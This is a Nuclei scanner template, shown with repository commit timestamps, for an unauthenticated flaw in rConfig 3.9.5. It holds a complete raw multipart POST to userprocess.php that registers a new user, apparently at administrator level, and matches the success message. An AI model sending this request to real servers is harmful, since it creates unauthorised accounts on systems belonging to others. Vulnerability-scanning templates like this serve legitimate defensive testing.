nuclei-templates/vulnerabilities/other/rconfig-rce.yaml

62 lines
1.7 KiB
YAML
Raw Normal View History

2020-10-15 17:26:11 +00:00
id: rconfig-rce
info:
name: rConfig 3.9.5 - Remote Code Execution
author: dwisiswant0
severity: high
2021-10-27 11:06:15 +00:00
description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878
tags: rconfig,rce,edb
2020-10-15 17:26:11 +00:00
requests:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
Cookie: PHPSESSID={{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="username"
{{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="passconf"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="password"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
2021-10-06 23:53:20 +00:00
test@{{randstr}}.tld
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
matchers-condition: and
matchers:
- type: word
words:
- "User {{randstr}} successfully added to Database"
2020-10-15 17:26:11 +00:00
part: body
- type: status
status:
- 302